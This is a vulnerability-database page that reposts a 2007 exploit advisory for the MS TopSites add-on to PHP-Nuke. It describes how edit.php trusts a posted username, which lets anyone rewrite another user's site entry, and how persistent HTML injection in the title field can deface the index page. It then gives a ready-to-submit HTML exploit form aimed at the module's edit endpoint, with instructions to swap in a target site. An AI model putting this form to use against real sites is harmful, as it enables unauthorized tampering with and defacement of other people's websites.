Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:18361
HistoryNov 07, 2007 - 12:00 a.m.

PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection

2007-11-0700:00:00
vulners.com
27

<!–

  • Author : 0x90
  • Homepage: WwW.0x90.CoM.Ar
  • Contact : Guns[at]0x90[dot]com[dot]ar
  • Product : Php Nuke add-on MS TopSites
  • Website : http://phpnuke.org/
  • Download: http://www.weblord.it/downloads/nuke65/addons/MS_TopSites_ITA.zip
  • Problem : Edit Exploit And Html Injection
  • Summary: The var $uname in the sql_query in edit.php is not bugged but it's simply taked with
    $_POST['uname'],
    let us change our "user", and modify as another one what we want.
    Sometimes we can do either permanent html injections in "title" that appears in index. In these cases
    we
    are able to change the index content of the site. :D-

–>

Html Exploit:

<!-- You have to edit the [Site] with the target site. In particular circumstaces you have to edit some
input.–>

<!-- You Must Not Have an userid and be logged in. Just execute This =) –>

<html><title>PhpNuke (add-on) MS TopSites Edit Exploit And Html Injection</title>
<body bgcolor="black" text="white">
<form action="http://localhost:81/modules.php?name=MS_TopSites&amp;file=edit " method="post">
<input size="92" type="text" value='' name="sname"> SiteNameTitle [sname] (not Target it must be
changed in the source) <br />
<input size="92" type="text" value="" name="uname"> Username [uname] <br />
<input size="92" type="text" value=" http://www.0x90.com.ar" name="url"> Url<br />
<input size="92" type="text" value="[email protected]" name="email"> Email<br />
<input size="92" type="text" value='' name="bottonurl"> BottonUrl<br />
<input size="92" type="text" value="Art" name="cat"> Cat <br />
<input size="92" type="text" value="Wedonotneeddescriptions" name="description"> Descriptions<br />
<input type="hidden" value="MSTopSitesSaveSite" name="op"><br />
<input type="submit" value="submit"><br />
</body></form>
</html>